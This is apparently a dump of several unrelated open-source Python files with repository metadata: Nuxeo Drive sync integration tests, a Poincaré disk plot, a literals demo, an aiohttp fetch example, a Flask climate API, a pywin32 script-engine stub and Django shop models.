    assert_equal(pending[3].path, '/Folder 1/Folder 1.2/File 3.txt')
    assert_equal(pending[4].path, '/Folder 2/Duplicated File.txt')
    assert_equal(pending[5].path, '/Folder 2/Duplicated File__1.txt')
    assert_equal(pending[6].path, '/Folder 2/File 4.txt')
    # It is also possible to restrict the list of pending document to a
    # specific root
    assert_equal(len(ctl.list_pending(local_root=expected_folder)), 7)
    # It is also possible to restrict the number of pending tasks
    pending = ctl.list_pending(limit=2)
    assert_equal(len(pending), 2)
    # Synchronize the first 2 documents:
    assert_equal(ctl.synchronize(limit=2), 2)
    pending = ctl.list_pending()
    assert_equal(len(pending), 5)
    assert_equal(pending[0].path, '/Folder 1/Folder 1.1/File 2.txt')
    assert_equal(pending[1].path, '/Folder 1/Folder 1.2/File 3.txt')
    assert_equal(pending[2].path, '/Folder 2/Duplicated File.txt')
    assert_equal(pending[3].path, '/Folder 2/Duplicated File__1.txt')
    assert_equal(pending[4].path, '/Folder 2/File 4.txt')
    states = ctl.children_states(expected_folder)
    expected_states = [
        (u'/File 5.txt', 'synchronized'),
        (u'/Folder 1', 'children_modified'),
        (u'/Folder 2', 'children_modified'),
    ]
    # NOTE(review): expected_states above is built but never asserted —
    # an assert_equal(states, expected_states) appears to be missing here;
    # confirm before adding it (the assertion may fail and mask a bug).
    # The actual content of the file has been updated
    assert_equal(local.get_content('/File 5.txt'), "eee")
    states = ctl.children_states(expected_folder + '/Folder 1')
    expected_states = [
        (u'/Folder 1/File 1.txt', 'synchronized'),
        (u'/Folder 1/Folder 1.1', 'children_modified'),
        (u'/Folder 1/Folder 1.2', 'children_modified'),
    ]
    assert_equal(states, expected_states)
    # synchronize everything else
    assert_equal(ctl.synchronize(), 5)
    assert_equal(ctl.list_pending(), [])
    states = ctl.children_states(expected_folder)
    expected_states = [
        (u'/File 5.txt', 'synchronized'),
        (u'/Folder 1', 'synchronized'),
        (u'/Folder 2', 'synchronized'),
    ]
    assert_equal(states, expected_states)
    states = ctl.children_states(expected_folder + '/Folder 1')
    expected_states = [
        (u'/Folder 1/File 1.txt', 'synchronized'),
        (u'/Folder 1/Folder 1.1', 'synchronized'),
        (u'/Folder 1/Folder 1.2', 'synchronized'),
    ]
    assert_equal(states, expected_states)
    assert_equal(local.get_content('/Folder 1/File 1.txt'), "aaa")
    assert_equal(local.get_content('/Folder 1/Folder 1.1/File 2.txt'), "bbb")
    assert_equal(local.get_content('/Folder 1/Folder 1.2/File 3.txt'), "ccc")
    assert_equal(local.get_content('/Folder 2/File 4.txt'), "ddd")
    assert_equal(local.get_content('/Folder 2/Duplicated File.txt'),
                 "Some content.")
    assert_equal(local.get_content('/Folder 2/Duplicated File__1.txt'),
                 "Other content.")
    # Nothing else left to synchronize
    assert_equal(ctl.list_pending(), [])
    assert_equal(ctl.synchronize(), 0)
    assert_equal(ctl.list_pending(), [])
@with_integration_env
def test_binding_synchronization_empty_start():
    """End-to-end sync scenario starting from an empty local folder.

    Exercises the full lifecycle: initial remote scan, first download,
    concurrent local/remote edits, re-sync, fixpoint detection on rescan,
    and transfer of payloads that are not valid utf-8/ascii.
    """
    ctl.bind_server(LOCAL_NXDRIVE_FOLDER, NUXEO_URL, USER, PASSWORD)
    ctl.bind_root(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE)
    expected_folder = os.path.join(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE_TITLE)
    # Nothing to synchronize by default
    assert_equal(ctl.list_pending(), [])
    assert_equal(ctl.synchronize(), 0)
    # Let's create some document on the server
    make_server_tree()
    # By default nothing is detected
    assert_equal(ctl.list_pending(), [])
    #assert_equal(ctl.children_states(expected_folder), [])
    # Let's scan manually
    session = ctl.get_session()
    ctl.scan_remote(expected_folder, session)
    # Changes on the remote server have been detected...
    assert_equal(len(ctl.list_pending()), 11)
    # ...but nothing is yet visible locally as those files don't exist there
    # yet.
    #assert_equal(ctl.children_states(expected_folder), [])
    # Let's perform the synchronization
    assert_equal(ctl.synchronize(limit=100), 11)
    # We should now be fully synchronized
    assert_equal(len(ctl.list_pending()), 0)
    assert_equal(ctl.children_states(expected_folder), [
        (u'/File 5.txt', u'synchronized'),
        (u'/Folder 1', u'synchronized'),
        (u'/Folder 2', u'synchronized'),
    ])
    local = LocalClient(expected_folder)
    assert_equal(local.get_content('/Folder 1/File 1.txt'), "aaa")
    assert_equal(local.get_content('/Folder 1/Folder 1.1/File 2.txt'), "bbb")
    assert_equal(local.get_content('/Folder 1/Folder 1.2/File 3.txt'), "ccc")
    assert_equal(local.get_content('/Folder 2/File 4.txt'), "ddd")
    assert_equal(local.get_content('/Folder 2/Duplicated File.txt'),
                 "Some content.")
    assert_equal(local.get_content('/Folder 2/Duplicated File__1.txt'),
                 "Other content.")
    # Wait a bit for file time stamps to increase enough: on most OS the file
    # modification time resolution is 1s
    time.sleep(1.0)
    # Let do some local and remote changes concurrently
    local.delete('/File 5.txt')
    local.update_content('/Folder 1/File 1.txt', 'aaaa')
    remote_client.update_content('/Folder 1/Folder 1.1/File 2.txt', 'bbbb')
    remote_client.delete('/Folder 2')
    f3 = remote_client.make_folder(TEST_WORKSPACE, 'Folder 3')
    remote_client.make_file(f3, 'File 6.txt', content='ffff')
    local.make_folder('/', 'Folder 4')
    # Rescan
    ctl.scan_local(expected_folder, session)
    ctl.scan_remote(expected_folder, session)
    assert_equal(ctl.children_states(expected_folder), [
        (u'/File 5.txt', u'locally_deleted'),
        (u'/Folder 1', u'children_modified'),
        (u'/Folder 2', u'children_modified'), # what do we want for this?
        # Folder 3 is not yet visible as no sync has happened yet to give it
        # a local path
        (u'/Folder 4', u'unknown'),
    ])
    # It is possible to fetch the full children states of the root though:
    full_states = ctl.children_states(expected_folder, full_states=True)
    assert_equal(len(full_states), 5)
    assert_equal(full_states[0][0].remote_name, 'Folder 3')
    assert_equal(full_states[0][1], 'children_modified')
    states = ctl.children_states(expected_folder + '/Folder 1')
    expected_states = [
        (u'/Folder 1/File 1.txt', 'locally_modified'),
        (u'/Folder 1/Folder 1.1', 'children_modified'),
        (u'/Folder 1/Folder 1.2', 'synchronized'),
    ]
    assert_equal(states, expected_states)
    states = ctl.children_states(expected_folder + '/Folder 1/Folder 1.1')
    expected_states = [
        (u'/Folder 1/Folder 1.1/File 2.txt', u'remotely_modified'),
    ]
    assert_equal(states, expected_states)
    states = ctl.children_states(expected_folder + '/Folder 2')
    expected_states = [
        (u'/Folder 2/Duplicated File.txt', u'remotely_deleted'),
        (u'/Folder 2/Duplicated File__1.txt', u'remotely_deleted'),
        (u'/Folder 2/File 4.txt', u'remotely_deleted'),
    ]
    assert_equal(states, expected_states)
    # Perform synchronization
    assert_equal(ctl.synchronize(limit=100), 10)
    # We should now be fully synchronized again
    assert_equal(len(ctl.list_pending()), 0)
    assert_equal(ctl.children_states(expected_folder), [
        (u'/Folder 1', 'synchronized'),
        (u'/Folder 3', 'synchronized'),
        (u'/Folder 4', 'synchronized'),
    ])
    states = ctl.children_states(expected_folder + '/Folder 1')
    expected_states = [
        (u'/Folder 1/File 1.txt', 'synchronized'),
        (u'/Folder 1/Folder 1.1', 'synchronized'),
        (u'/Folder 1/Folder 1.2', 'synchronized'),
    ]
    assert_equal(states, expected_states)
    assert_equal(local.get_content('/Folder 1/File 1.txt'), "aaaa")
    assert_equal(local.get_content('/Folder 1/Folder 1.1/File 2.txt'), "bbbb")
    assert_equal(local.get_content('/Folder 3/File 6.txt'), "ffff")
    assert_equal(remote_client.get_content('/Folder 1/File 1.txt'),
                 "aaaa")
    assert_equal(remote_client.get_content('/Folder 1/Folder 1.1/File 2.txt'),
                 "bbbb")
    assert_equal(remote_client.get_content('/Folder 3/File 6.txt'),
                 "ffff")
    # Rescan: no change to detect we should reach a fixpoint
    ctl.scan_local(expected_folder, session)
    ctl.scan_remote(expected_folder, session)
    assert_equal(len(ctl.list_pending()), 0)
    assert_equal(ctl.children_states(expected_folder), [
        (u'/Folder 1', 'synchronized'),
        (u'/Folder 3', 'synchronized'),
        (u'/Folder 4', 'synchronized'),
    ])
    # Send some binary data that is not valid in utf-8 or ascii (to test the
    # HTTP / Multipart transform layer).
    time.sleep(1.0)
    local.update_content('/Folder 1/File 1.txt', "\x80")
    remote_client.update_content('/Folder 1/Folder 1.1/File 2.txt', '\x80')
    ctl.scan_local(expected_folder, session)
    ctl.scan_remote(expected_folder, session)
    assert_equal(ctl.synchronize(limit=100), 2)
    assert_equal(remote_client.get_content('/Folder 1/File 1.txt'), "\x80")
    assert_equal(local.get_content('/Folder 1/Folder 1.1/File 2.txt'), "\x80")
@with_integration_env
def test_synchronization_modification_on_created_file():
    """Regression test: a file is created locally, then a modification is
    detected before the first upload; the sync should treat it as a plain
    creation and not trigger a remote update.
    """
    ctl.bind_server(LOCAL_NXDRIVE_FOLDER, NUXEO_URL, USER, PASSWORD)
    ctl.bind_root(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE)
    expected_folder = os.path.join(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE_TITLE)
    assert_equal(ctl.list_pending(), [])
    # Let's create some document on the client and the server
    local = LocalClient(expected_folder)
    local.make_folder('/', 'Folder')
    local.make_file('/Folder', 'File.txt', content='Some content.')
    # First local scan (assuming the network is offline):
    ctl.scan_local(expected_folder)
    assert_equal(len(ctl.list_pending()), 2)
    assert_equal(ctl.children_states(expected_folder), [
        (u'/Folder', 'children_modified'),
    ])
    assert_equal(ctl.children_states(expected_folder + '/Folder'), [
        (u'/Folder/File.txt', u'unknown'),
    ])
    # Wait a bit for file time stamps to increase enough: on most OS the file
    # modification time resolution is 1s
    time.sleep(1.0)
    # Let's modify it offline and rescan locally
    local.update_content('/Folder/File.txt', content='Some content.')
    ctl.scan_local(expected_folder)
    assert_equal(len(ctl.list_pending()), 2)
    assert_equal(ctl.children_states(expected_folder), [
        (u'/Folder', u'children_modified'),
    ])
    assert_equal(ctl.children_states(expected_folder + '/Folder'), [
        (u'/Folder/File.txt', u'locally_modified'),
    ])
    # Assume the computer is back online, the synchronization should occur as if
    # the document was just created and not trigger an update
    ctl.loop(full_local_scan=True, full_remote_scan=True, delay=0.010,
             max_loops=1, fault_tolerant=False)
    assert_equal(len(ctl.list_pending()), 0)
    assert_equal(ctl.children_states(expected_folder), [
        (u'/Folder', u'synchronized'),
    ])
    assert_equal(ctl.children_states(expected_folder + '/Folder'), [
        (u'/Folder/File.txt', u'synchronized'),
    ])
@with_integration_env
def test_synchronization_loop():
    """Run the full scan/sync loop a bounded number of iterations and check
    that concurrent local and remote creations all converge to synchronized.
    """
    ctl.bind_server(LOCAL_NXDRIVE_FOLDER, NUXEO_URL, USER, PASSWORD)
    ctl.bind_root(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE)
    expected_folder = os.path.join(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE_TITLE)
    assert_equal(ctl.list_pending(), [])
    assert_equal(ctl.synchronize(), 0)
    # Let's create some document on the client and the server
    local = LocalClient(expected_folder)
    local.make_folder('/', 'Folder 3')
    make_server_tree()
    # Run the full synchronization loop a limited amount of times
    ctl.loop(full_local_scan=True, full_remote_scan=True, delay=0.010,
             max_loops=3, fault_tolerant=False)
    # All is synchronized
    assert_equal(len(ctl.list_pending()), 0)
    assert_equal(ctl.children_states(expected_folder), [
        (u'/File 5.txt', u'synchronized'),
        (u'/Folder 1', u'synchronized'),
        (u'/Folder 2', u'synchronized'),
        (u'/Folder 3', u'synchronized'),
    ])
@with_integration_env
def test_synchronization_offline():
    """Check that network/server failures make the sync loop a no-op (not a
    crash), and that synchronization resumes once the failure is cleared.
    """
    ctl.bind_server(LOCAL_NXDRIVE_FOLDER, NUXEO_URL, USER, PASSWORD)
    ctl.bind_root(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE)
    expected_folder = os.path.join(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE_TITLE)
    assert_equal(ctl.list_pending(), [])
    assert_equal(ctl.synchronize(), 0)
    # Let's create some document on the client and the server
    local = LocalClient(expected_folder)
    local.make_folder('/', 'Folder 3')
    make_server_tree()
    # Find various ways to simulate network or server failure
    errors = [
        urllib2.URLError('Test error'),
        socket.error('Test error'),
        httplib.HTTPException('Test error'),
    ]
    for error in errors:
        # Make every remote call raise this error.
        ctl.make_remote_raise(error)
        # Synchronization does not occur but does not fail either
        ctl.loop(full_local_scan=True, full_remote_scan=True, delay=0,
                 max_loops=1, fault_tolerant=False)
        # Only the local change has been detected
        assert_equal(len(ctl.list_pending()), 1)
    # Reenable network
    ctl.make_remote_raise(None)
    ctl.loop(full_local_scan=True, full_remote_scan=True, delay=0,
             max_loops=1, fault_tolerant=False)
    # All is synchronized
    assert_equal(len(ctl.list_pending()), 0)
    assert_equal(ctl.children_states(expected_folder), [
        (u'/File 5.txt', u'synchronized'),
        (u'/Folder 1', u'synchronized'),
        (u'/Folder 2', u'synchronized'),
        (u'/Folder 3', u'synchronized'),
    ])
| [
"olivier.grisel@ensta.org"
] | olivier.grisel@ensta.org |
b6fee919c70d1e39c2b3d355b1d28e92deee5f0f | 4538a25701f9f108278036ab520a81dcb0de15fe | /non-euclidean/poincare_disk.py | 3b4db43c4f79cbcb2967125f2771ddae7b9111fc | [
"MIT"
] | permissive | foamliu/Complex-Analysis | daef349ddf5ad8f8037fb026d4eab35d4a3192c8 | 6389c69dad680015cb7fa5fe9789793638ccddd0 | refs/heads/master | 2020-05-09T21:00:24.454517 | 2019-05-28T09:37:17 | 2019-05-28T09:37:17 | 181,427,148 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | import matplotlib.pyplot as plt
import numpy as np

# Sample a rectangle of the upper half-plane: u is the real part,
# v >= 0 the imaginary part.
u = np.linspace(-1, 1, 200)
v = np.linspace(0, 3, 360)
uu, vv = np.meshgrid(u, v)
z0 = uu + 1j * vv
# Moebius (Cayley-type) transform: maps the closed upper half-plane
# into the closed unit disk (the real axis maps onto the unit circle).
z = (1j * z0 + 1) / (z0 + 1j)
# Color each point by its angle so the mapping of directions is visible.
T = np.arctan2(uu, vv)
plt.figure(figsize=(14, 6))
# Left panel: the points in their original half-plane coordinates.
plt.subplot(1, 2, 1)
plt.scatter(uu, vv, c=T, s=10, lw=0, cmap='hsv')
plt.title('real points')
plt.xlabel('Re(z)')
plt.ylabel('Im(z)')
plt.axis('equal')
plt.grid(True)
# Right panel: their images inside the Poincare disk.
plt.subplot(1, 2, 2)
plt.scatter(np.real(z), np.imag(z), c=T, s=10, lw=0, cmap='hsv')
plt.title('poincare disk')
plt.xlabel('Re(z)')
plt.ylabel('Im(z)')
plt.axis('equal')
plt.grid(True)
plt.show()
| [
"foamliu@yeah.net"
] | foamliu@yeah.net |
fd8db4fd2ea2cced67e397b5060fe198e20fc74a | 97326c2dcdcc9ef8232d99e4445a1cc6a37aec22 | /docs/conditionals/example-6.py | bfb84e4bbe26d99c2358aba5838785b36a1e70e8 | [] | no_license | Barnsa/programming-resources | 8e1c043106089f10553eb8f303486905c7215c77 | 1ad0483a0f964f36fe65fda2d614c2782e0f1ed1 | refs/heads/master | 2022-11-17T17:06:56.736072 | 2020-07-21T13:06:52 | 2020-07-21T13:06:52 | 266,988,442 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # example-6.py
# examples of exotic literals at work
string_literals = "string"
integer_literals = 12
octal_literals = 0o11
hexadecimal_literals = 0x123
set_literals = {2, 4, 7}
complex_literals = 12J
unicode_literals = u"string"
byte_code_literals = b"string"
print(
string_literals,
integer_literals,
octal_literals,
hexadecimal_literals,
set_literals,
complex_literals,
unicode_literals,
byte_code_literals
) | [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
fcd354527ad7264d9770ddd8aa6d4c00fc4838c0 | 3fcd2c184abaa9bef5f4a916fbf0e9587da06346 | /IO/Asynchronous/Asyncio/aio_http.py | 7334a8e74fea9ff2ad791431ca5cf882865cab4a | [] | no_license | chinitacode/Python_Learning | 865ff42722e256776ae91d744b779fa476e23f45 | 49aa02367e3097aca107b70dab43b5f60a67ef9f | refs/heads/master | 2020-06-29T01:05:39.331297 | 2020-03-21T14:29:51 | 2020-03-21T14:29:51 | 200,393,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 509 | py | import asyncio,aiohttp
async def fetch_async(url):
    """Issue an async HTTP GET for ``url`` and print the decoded body."""
    print(url)
    async with aiohttp.request("GET",url) as r:
        reponse = await r.text(encoding="utf-8")
        # Alternatively use ``await r.read()`` to fetch the raw bytes without
        # decoding, which suits images and other non-text payloads.
        print(reponse)
# Fan out both fetches concurrently and block until every coroutine finishes.
tasks = [fetch_async('http://www.baidu.com/'), fetch_async('http://www.chouti.com/')]
event_loop = asyncio.get_event_loop()
results = event_loop.run_until_complete(asyncio.gather(*tasks))
event_loop.close()
| [
"ziyu_zhou_victoria@163.com"
] | ziyu_zhou_victoria@163.com |
93c65dd75d66f049ff657435e9c8c72035489204 | 8a38510041fbd73e23f120c59972234f79fcfc92 | /.history/app_20200724004120.py | fc080273444efadba537baadb536e3b2a0a3e5e9 | [] | no_license | ermiasgelaye/sqlalchemy-challenge | 232fee2fa899a5d4ad4fe69f229d55d7d5d6d494 | 329560a1bf137c3ed61181c2500800fb311179f1 | refs/heads/master | 2022-11-28T20:06:15.832330 | 2020-07-25T18:43:33 | 2020-07-25T18:43:33 | 280,707,720 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,665 | py | import numpy as np
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
import datetime as dt
from dateutil.relativedelta import relativedelta
#################################################
# Database Setup
#################################################
engine = create_engine("sqlite:///./Resources/hawaii.sqlite")
# Reflect an existing database into a new model.
Base = automap_base()
# Reflect the tables.
Base.prepare(engine, reflect=True)
# Save reference to the tables.
Measurement = Base.classes.measurement
Station = Base.classes.station
# print(Base.classes.keys())
#################################################
# Flask Setup
#################################################
app = Flask(__name__,static_url_path='/Images/surfs-up.png')
#################################################
# Flask Routes
#################################################
# Set the home page,and List all routes that are available. For easy to use I hyperlink the list
@app.route("/")
def welcome():
    """Render the landing page listing all available API routes.

    Returns:
        str: An HTML fragment (Flask wraps the returned string in a 200
            response) with both a plain and a hyperlinked route listing.
    """
    return (
        f"<h1>Welcome to the Climate App API!</h1>"
        f"<h1>Step 2 - Climate App</h1>"
        # Bug fix: the original image line mixed double quotes inside a
        # double-quoted f-string, which was a SyntaxError. Use single quotes
        # for the HTML attributes so the literal stays valid.
        f"<p>Produces this image in our document:<br>"
        f"<img width='200' src='http://az616578.vo.msecnd.net/files/2016/07/08/"
        f"6360356198438627441310256453_dog%20college.jpg'/></p>"
        f"This is a Flask API for Climate Analysis .<br/><br/><br/>"
        f"<h2>Here are the Available Routes:</h2>"
        f"/api/v1.0/precipitation<br/>"
        f"/api/v1.0/stations<br/>"
        f"/api/v1.0/tobs<br/>"
        f"/api/v1.0/start<br/>"
        f"/api/v1.0/start/end<br/>"
        f"<h2>Here you can get the hyperlinked Routes list click the link to see the pages:</h2>"
        f"<ol><li><a href=http://127.0.0.1:5000/api/v1.0/precipitation>"
        f"JSON list of precipitation amounts by date for the most recent year of data available</a></li><br/><br/>"
        f"<li><a href=http://127.0.0.1:5000/api/v1.0/stations>"
        f"JSON list of weather stations and their details</a></li><br/><br/>"
        f"<li><a href=http://127.0.0.1:5000/api/v1.0/tobs>"
        f"JSON list of the last 12 months of recorded temperatures</a></li><br/><br/>"
        f"<li><a href=http://127.0.0.1:5000/api/v1.0/2017-08-23>"
        f"When given the start date (YYYY-MM-DD), calculates the minimum, average, and maximum temperature for all dates greater than and equal to the start date</a></li><br/><br/>"
        f"<li><a href=http://127.0.0.1:5000/api/v1.0/2016-08-23/2017-08-23>"
        f"When given the start and the end date (YYYY-MM-DD), calculate the minimum, average, and maximum temperature for dates between the start and end date</a></li></ol><br/>"
    )
@app.route("/api/v1.0/precipitation")
def precipitation():
    """Return a JSON list of one-entry {date: prcp} dicts covering the last
    12 months of precipitation data on record."""
    session = Session(engine)
    # Most recent measurement date present in the dataset.
    (newest_date_str, ) = session.query(
        Measurement.date).order_by(Measurement.date.desc()).first()
    newest_date = dt.datetime.strptime(newest_date_str, '%Y-%m-%d').date()
    one_year_back = newest_date - relativedelta(years=1)
    # All (date, prcp) rows from that cutoff onwards.
    recent_rows = session.query(Measurement.date, Measurement.prcp).filter(
        Measurement.date >= one_year_back).all()
    session.close()
    # One single-key dict per row; rows without a precipitation value are
    # skipped entirely.
    all_precipication = [{row_date: row_prcp}
                         for row_date, row_prcp in recent_rows
                         if row_prcp is not None]
    return jsonify(all_precipication)
@app.route("/api/v1.0/tobs")
def tobs():
    """Return a JSON list of one-entry {date: temperature} dicts for the most
    active station over the last 12 months of data."""
    session = Session(engine)
    # Most recent measurement date present in the dataset.
    (newest_date_str, ) = session.query(
        Measurement.date).order_by(Measurement.date.desc()).first()
    newest_date = dt.datetime.strptime(newest_date_str, '%Y-%m-%d').date()
    one_year_back = newest_date - relativedelta(years=1)
    # Station with the highest number of measurement rows.
    (most_active_station_id, ) = session.query(Measurement.station).\
        group_by(Measurement.station).\
        order_by(func.count().desc()).\
        first()
    print(
        f"The station id of the most active station is {most_active_station_id}.")
    # Temperature observations for that station within the last year.
    recent_rows = session.query(Measurement.date, Measurement.tobs).filter(
        Measurement.station == most_active_station_id).filter(Measurement.date >= one_year_back).all()
    session.close()
    # One single-key dict per row; rows without a temperature are skipped.
    all_temperatures = [{row_date: row_temp}
                        for row_date, row_temp in recent_rows
                        if row_temp is not None]
    return jsonify(all_temperatures)
@app.route("/api/v1.0/stations")
def stations():
    """Return a JSON list of all weather stations with their metadata."""
    session = Session(engine)
    rows = session.query(Station.station, Station.name,
                         Station.latitude, Station.longitude, Station.elevation).all()
    session.close()
    # The selected columns, in query order, become the dict keys.
    field_names = ("station", "name", "latitude", "longitude", "elevation")
    all_stations = [dict(zip(field_names, row)) for row in rows]
    return jsonify(all_stations)
@app.route('/api/v1.0/<start>', defaults={'end': None})
@app.route("/api/v1.0/<start>/<end>")
def determine_temps_for_date_range(start, end):
    """Return a JSON list [TMIN, TAVG, TMAX] for the given date range.

    With only a start date (YYYY-MM-DD), the aggregates cover all dates
    greater than or equal to it; with both start and end, the range is
    inclusive on both sides.
    """
    session = Session(engine)
    aggregates = [func.min(Measurement.tobs),
                  func.avg(Measurement.tobs),
                  func.max(Measurement.tobs)]
    # Build the query incrementally: the end-date filter is optional.
    query = session.query(*aggregates).filter(Measurement.date >= start)
    if end is not None:
        query = query.filter(Measurement.date <= end)
    temperature_data = query.all()
    session.close()
    # Flatten the aggregate rows and remember whether any value was missing.
    temperature_list = []
    missing_data = False
    for min_temp, avg_temp, max_temp in temperature_data:
        if min_temp is None or avg_temp is None or max_temp is None:
            missing_data = True
        temperature_list.extend((min_temp, avg_temp, max_temp))
    if missing_data:
        return "No temperature data found for the given date range. Try another date range."
    return jsonify(temperature_list)
if __name__ == '__main__':
    # Run the Flask development server (debug mode: auto-reload + tracebacks).
    app.run(debug=True)
| [
"ermiasgelaye@gmail.com"
] | ermiasgelaye@gmail.com |
c841438efbd14ab47aef4d8d1813c0b63f7c73b0 | 3546dd5dbcffc8509440c820faa7cf28080c5df7 | /python35/Lib/site-packages/win32comext/axscript/client/pydumper.py | a4a3a5941321bfaad120bfa5bedbefa34bfa6bae | [
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"LGPL-2.1-only"
] | permissive | Matchoc/python_env | 55ad609c8270cc6148eda22d37f36709d73b3652 | 859d84d1717a265a4085ad29706b12c19c62d36f | refs/heads/master | 2022-02-13T11:05:51.825544 | 2020-06-05T02:42:08 | 2020-06-05T02:42:08 | 75,793,921 | 0 | 1 | Apache-2.0 | 2018-12-14T07:30:28 | 2016-12-07T03:06:13 | Python | UTF-8 | Python | false | false | 2,204 | py | # pydumper.py
#
# This is being worked on - it does not yet work at all, in ay way
# shape or form :-)
#
# A new script engine, derived from the standard scripting engine,
# which dumps information.
# This generally can be used to grab all sorts of useful details about
# an engine - expose bugs in it or Python, dump the object model, etc.
# As it is derived from the standard engine, it fully supports Python
# as a scripting language - meaning the dumps produced can be quite dynamic,
# and based on the script code you execute.
from . import pyscript
from win32com.axscript import axscript
from .pyscript import RaiseAssert, trace, Exception, SCRIPTTEXT_FORCEEXECUTION
PyDump_CLSID = '{ac527e60-c693-11d0-9c25-00aa00125a98}'
class AXScriptAttribute(pyscript.AXScriptAttribute):
    """Unmodified subclass: reuses the standard engine's attribute wrapper."""
    pass
class NamedScriptAttribute(pyscript.NamedScriptAttribute):
    """Unmodified subclass: reuses the standard engine's named-item wrapper."""
    pass
class PyScript(pyscript.PyScript):
    """Unmodified subclass: currently behaves exactly like the standard
    Python scripting engine; dumping hooks are still to be added."""
    pass
def Register():
    """Register the PyDump debugging/dumping ActiveX scripting engine.

    Pass ``-d`` on the command line to register with the Win32 trace
    dispatcher so engine activity can be observed with the trace collector.
    """
    import sys
    if '-d' in sys.argv:
        dispatcher = "DispatcherWin32trace"
        debug_desc = " (" + dispatcher + ")"
        debug_option = "Yes"  # informational only; not passed anywhere yet
    else:
        dispatcher = None
        debug_desc = ""
        debug_option = ""
    categories = [axscript.CATID_ActiveScript, axscript.CATID_ActiveScriptParse]
    clsid = PyDump_CLSID
    lcid = 0x0409  # english (not currently passed to the registration helper)
    policy = None  # "win32com.axscript.client.axspolicy.AXScriptPolicy"
    print("Registering COM server%s..." % debug_desc)
    # Bug fix: CreateRegKey and the register module were used below but never
    # imported -- 'from win32com.axscript import axscript' does not bind the
    # 'win32com' name, so both lookups raised NameError at registration time.
    import win32com.server.register
    from win32com.server.register import RegisterServer, CreateRegKey
    languageName = "PyDump"
    verProgId = "Python.Dumper.1"
    RegisterServer(clsid=clsid, pythonInstString="win32com.axscript.client.pyscript.PyDumper",
                   className="Python Debugging/Dumping ActiveX Scripting Engine",
                   progID=languageName, verProgID=verProgId,
                   catids=categories,
                   policy=policy, dispatcher=dispatcher)
    CreateRegKey(languageName + "\\OLEScript")
    # Basic Registration for wsh.
    win32com.server.register._set_string(".pysDump", "pysDumpFile")
    win32com.server.register._set_string("pysDumpFile\\ScriptEngine", languageName)
    print("Dumping Server registered.")
if __name__=='__main__':
    # Allow 'python pydumper.py [-d]' to perform COM registration directly.
    Register()
| [
"matchoc@hotmail.com"
] | matchoc@hotmail.com |
ceda2d124f5d6c5c706163f206aa8d15a250ada9 | 4f0385a90230c0fe808e8672bb5b8abcceb43783 | /LNH/day5-teacher/7 包的使用/xxx/yyy/aaa/m1.py | 52ba2ce0ef803ea3d3ad665913b4de82ebbc6d7b | [] | no_license | lincappu/pycharmlearningproject | 4084dab7adde01db9fa82a12769a67e8b26b3382 | b501523e417b61373688ba12f11b384166baf489 | refs/heads/master | 2023-07-10T05:21:15.163393 | 2023-06-29T14:02:35 | 2023-06-29T14:02:35 | 113,925,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30 | py | def f1():
print('from f1') | [
"lincappu@163.com"
] | lincappu@163.com |
078cbf9ece2db7c8b5f1892f5fcbb5f78c300ffa | fe8fa8bf7273a7894f91f5027880164358047e85 | /shop/models.py | b673dfc67bb0d074ce0066def6e818b5590979ea | [
"MIT"
] | permissive | urosjevremovic/online-shop | 7935be8947ebaa4f44c28dae6ed0b895c89fcd0e | 39328da7438852206a355df5a4ae6c8aa90c186b | refs/heads/master | 2020-03-23T16:42:25.248301 | 2018-07-25T15:07:35 | 2018-07-25T15:07:35 | 141,823,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,363 | py | from django.db import models
from django.urls import reverse
class Category(models.Model):
    """Product category; groups products and owns a unique URL slug."""
    # Human-readable category name; indexed for fast lookups in listings.
    name = models.CharField(max_length=120, db_index=True)
    # URL fragment identifying the category; must be unique across categories.
    slug = models.CharField(max_length=120, unique=True)

    class Meta:
        # Categories list in reverse alphabetical order by default.
        ordering = ('-name', )
        verbose_name = 'category'
        verbose_name_plural = 'categories'

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        # Canonical listing page for products belonging to this category.
        return reverse('shop:product_list_by_category', args=[self.slug])
class Product(models.Model):
    """A purchasable item belonging to exactly one :class:`Category`."""
    # Deleting a category cascades to its products.
    category = models.ForeignKey(Category, related_name='product', on_delete=models.CASCADE)
    name = models.CharField(max_length=200, db_index=True)
    # URL fragment; indexed together with id (see Meta) to match the
    # (id, slug) lookup used by get_absolute_url.
    slug = models.CharField(max_length=200, db_index=True)
    # Uploaded images are organized by upload date under MEDIA_ROOT/product/.
    image = models.ImageField(upload_to='product/%Y/%m/%d', blank=True)
    description = models.TextField(blank=True)
    price = models.DecimalField(max_digits=10, decimal_places=2)
    # Units on hand; new products start with 20 by default.
    stock = models.IntegerField(default=20)
    available = models.BooleanField(default=True)
    created = models.DateTimeField(auto_now_add=True)
    updated = models.DateTimeField(auto_now=True)

    class Meta:
        ordering = ('-name', )
        # Composite index supporting the detail-page (id, slug) lookups.
        index_together = (('id', 'slug'), )

    def __str__(self):
        return self.name

    def get_absolute_url(self):
        return reverse('shop:product_detail', args=[self.id, self.slug])
| [
"jevremovic.uros91@gmail.com"
] | jevremovic.uros91@gmail.com |
a9c0cc46a672f103bd8cb638903d9daa7764666c | 0c90211f4564d4541aade68cf93997bcf64827f1 | /tests/common/plugins/conditional_mark/__init__.py | 371617973861cdc6d31896fc5259a5c3c16839c3 | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
